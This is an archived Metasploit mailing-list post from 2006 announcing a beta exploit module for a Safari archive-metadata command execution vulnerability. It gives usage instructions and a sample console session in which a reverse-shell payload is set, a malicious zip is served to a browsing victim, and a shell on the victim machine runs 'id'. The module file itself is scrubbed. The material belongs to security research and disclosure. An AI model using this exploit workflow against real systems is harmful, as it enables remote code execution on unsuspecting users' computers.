Metasploit mailing list archives
Safari Archive Metadata Command Execution
From: hdm at metasploit.com (H D Moore)
Date: Wed, 22 Feb 2006 01:12:36 -0600
Hello, Attached is a beta module for the Safari vulnerability announced today. The module depends on the 'zip' utility being in your path (MSFCygwin users should already have this installed). To use, load the module, select a payload, and then browse to the web service with a vulnerable version of Safari. It should automatically open the zip file and execute the shell script containing the payload. Please mail me offlist if you encounter problems with this module. Thanks! -HD -- sample run -- msf > use safari_safefiles_exec msf safari_safefiles_exec(cmd_re) > set PAYLOAD cmd_unix_reverse PAYLOAD -> cmd_unix_reverse msf safari_safefiles_exec(cmd_unix_reverse) > set LHOST 192.168.0.100 LHOST -> 192.168.0.100 msf safari_safefiles_exec(cmd_unix_reverse) > set LPORT 4321 LPORT -> 4321 msf safari_safefiles_exec(cmd_unix_reverse) > exploit [*] Starting Reverse Handler. [*] Waiting for connections to http://192.168.0.100:8080/ adding: LR6E45uoWshn3.mov (deflated 24%) adding: __MACOSX/._LR6E45uoWshn3.mov (deflated 87%) [*] HTTP Client connected from ME:49381, sending 98 bytes of payload... [*] Recieved first connection. [*] Recieved second connection. [*] Got connection from 192.168.0.100:4321 <-> 192.168.0.167:49393 192.168.0.100:4321 <-> 192.168.0.167:49392 id uid=501(hdm) gid=501(hdm) groups=501(hdm), 79(appserverusr), 80(admin), 81 (appserveradm) -------------- next part -------------- A non-text attachment was scrubbed... Name: safari_safefiles_exec.pm Type: application/x-perl-module Size: 13072 bytes Desc: not available URL: <http://mail.metasploit.com/pipermail/framework/attachments/20060222/3d38b45a/attachment.bin>
Current thread:
- Safari Archive Metadata Command Execution H D Moore (Feb 21)